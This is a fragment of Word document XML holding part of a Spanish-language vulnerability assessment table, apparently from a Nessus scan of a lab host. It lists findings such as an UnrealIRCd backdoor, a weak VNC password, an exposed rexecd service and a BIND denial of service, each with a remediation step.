            </w:pPr>
            <w:r w:rsidRPr="00742C21">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Actualice a una versión del sistema operativo Unix que actualmente sea compatible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="52DA7690" w14:textId="77777777" w:rsidTr="006668AF">
        <w:trPr>
          <w:trHeight w:val="2850"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F0CB1ED" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4B1A2991" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7A15507D" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0402CDC8" w14:textId="45B98AF9" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FB7A0E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A9D225B" w14:textId="65F1994A" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00403067">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>UnrealIRCd Backdoor Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="104C37A8"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793BFFCE" w14:textId="7A330F39" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pP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0DD180B1" w14:textId="01372DCF" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E5F45">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El servidor IRC remoto es una versión de UnrealIRCd con una puerta trasera que permite a un atacante ejecutar código arbitrario en el host afectado.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3942CDB5" w14:textId="042C73E0" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E5F45">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Vuelva a descargar el software, verifíquelo usando las sumas de verificación MD5 / SHA1 publicadas y vuelva a instalarlo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="52CDEB2A" w14:textId="77777777" w:rsidTr="007043EF">
        <w:trPr>
          <w:trHeight w:val="1128"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22AB2316" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="22035C0A" w14:textId="64802227" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E7CA5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75EEAA6B" w14:textId="684565C7" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E5F45">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>VNC Server 'password' Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A99BCD3"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600CD350" w14:textId="772D620B" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">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67139B6C" w14:textId="4F3D3E60" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El servidor VNC que se ejecuta en el host remoto está protegido con una contraseña débil. Nessus pudo iniciar sesión</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>utilizando la autenticación VNC y una contraseña de '</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>'. Un atacante remoto no autenticado podría explotar</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>esto para tomar el control del sistema.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="763E65A2" w14:textId="67F79E83" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Asegure el servicio VNC con una contraseña segura.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="3936C9F4" w14:textId="77777777" w:rsidTr="007043EF">
        <w:trPr>
          <w:trHeight w:val="2420"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0233DAC6" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6A9107FB" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="40C39914" w14:textId="58EC210B" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E7CA5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD4608B" w14:textId="524C64AA" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>rexecd Service Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DEA7941" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Critico</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30888AE4" w14:textId="4E8DD045" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pP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014510DE" w14:textId="6D8D30F1" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El servicio reexecd se está ejecutando en el host remoto. Este servicio está diseñado para permitir a los usuarios de una red</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>ejecutar comandos de forma remota.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Sin embargo, rexecd no proporciona ningún buen medio de autenticación, por lo que un atacante puede abusar de él </w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3" w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>para</w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00DC02D3" w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>escanear</w:t>
            </w:r>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> un host de terceros.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A4C56D" w14:textId="15762441" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00932756">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Comente la línea 'exec' en /etc/inetd.conf y reinicie el proceso inetd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F2B55" w:rsidRPr="00116FD9" w14:paraId="027C92D0" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="72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05EE7567" w14:textId="6B10D9B7" w:rsidR="005F2B55" w:rsidRPr="00F26227" w:rsidRDefault="00343B24"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Pr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="281AA924" w14:textId="44698F37" w:rsidR="005F2B55" w:rsidRPr="00116FD9" w:rsidRDefault="00116FD9" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>ISC BIND Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6789A0D5" w14:textId="77777777" w:rsidR="005F2B55"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Medio</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D790D0" w14:textId="47246815" w:rsidR="00116FD9" w:rsidRPr="00F26227" w:rsidRDefault="00116FD9" w:rsidP="00250C4A">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65DB4105" w14:textId="77777777" w:rsidR="005F2B55" w:rsidRDefault="005F2B55" w:rsidP="00250C4A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4D20237C" w14:textId="32F90E37" w:rsidR="005F2B55" w:rsidRDefault="00116FD9" w:rsidP="00116FD9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00116FD9">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
